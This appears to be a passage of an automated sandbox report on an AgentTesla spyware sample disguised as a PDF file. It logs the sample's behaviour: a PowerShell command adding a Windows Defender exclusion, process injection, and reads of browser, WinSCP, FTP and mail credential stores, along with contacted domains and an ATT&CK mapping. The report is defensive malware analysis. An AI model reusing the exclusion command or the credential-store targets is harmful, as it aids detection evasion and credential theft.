                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595344Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595234Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595125Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595015Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 594906Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 594797Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 594687Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 594578Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 594469Jump to behavior
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3858284388.00000000012C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1428858547.0000000007230000.00000004.08000000.00040000.00000000.sdmp, CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1424716965.0000000003D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: HLssqEMUhi
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeMemory written: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess created: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeQueries volume information: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeQueries volume information: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 5.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.3862005678.000000000327C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.3857823640.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.3862005678.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1424716965.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe PID: 7492, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe PID: 7684, type: MEMORYSTR
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: Yara matchFile source: 5.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.3857823640.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.3862005678.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1424716965.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe PID: 7492, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe PID: 7684, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 5.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.3f891f0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.3862005678.000000000327C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.3857823640.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.3862005678.0000000003251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1424716965.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe PID: 7492, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe PID: 7684, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		2
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		1
                  Input Capture                  		24
                  System Information Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)12
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		111
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                  Software Packing                  		NTDS1
                  Process Discovery                  		Distributed Component Object Model1
                  Input Capture                  		13
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA Secrets141
                  Virtualization/Sandbox Evasion                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                  Masquerading                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                  Virtualization/Sandbox Evasion                  		DCSync1
                  System Network Configuration Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                  Process Injection                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  CHARIKLIA JUNIOR DETAILS.pdf.scr.exe55%ReversingLabsWin32.Spyware.Negasteal
                  CHARIKLIA JUNIOR DETAILS.pdf.scr.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  beirutrest.com
                  		50.87.144.157
                  		truefalse
                    		high
                    api.ipify.org
                    		104.26.12.205
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://api.ipify.org/false
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://api.ipify.orgCHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1424716965.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3862005678.0000000003201000.00000004.00000800.00020000.00000000.sdmp, CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3857823640.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          		high
                          http://tempuri.org/ianiDataSet1.xsdCHARIKLIA JUNIOR DETAILS.pdf.scr.exefalse
                            		high
                            https://account.dyn.com/CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1424716965.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3857823640.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                              		high
                              https://api.ipify.org/tCHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3862005678.0000000003201000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1423822508.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3862005678.0000000003201000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://beirutrest.comCHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3862005678.000000000327C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://tempuri.org/ianiDataSet2.xsdMCHARIKLIA JUNIOR DETAILS.pdf.scr.exefalse
                                      		high
                                      http://tempuri.org/ianiDataSet.xsdCHARIKLIA JUNIOR DETAILS.pdf.scr.exefalse
                                        		high

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        104.26.12.205
                                        		api.ipify.orgUnited States
                                        		13335CLOUDFLARENETUSfalse
                                        50.87.144.157
                                        		beirutrest.comUnited States
                                        		46606UNIFIEDLAYER-AS-1USfalse

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1560091
                                        Start date and time:2024-11-21 11:50:08 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 7m 51s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:10
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@6/6@2/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 95
                                        • Number of non-executed functions: 9
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtCreateKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • VT rate limit hit for: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        05:51:02API Interceptor10204700x Sleep call for process: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe modified
                                        05:51:04API Interceptor10x Sleep call for process: powershell.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        104.26.12.205Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                        • api.ipify.org/
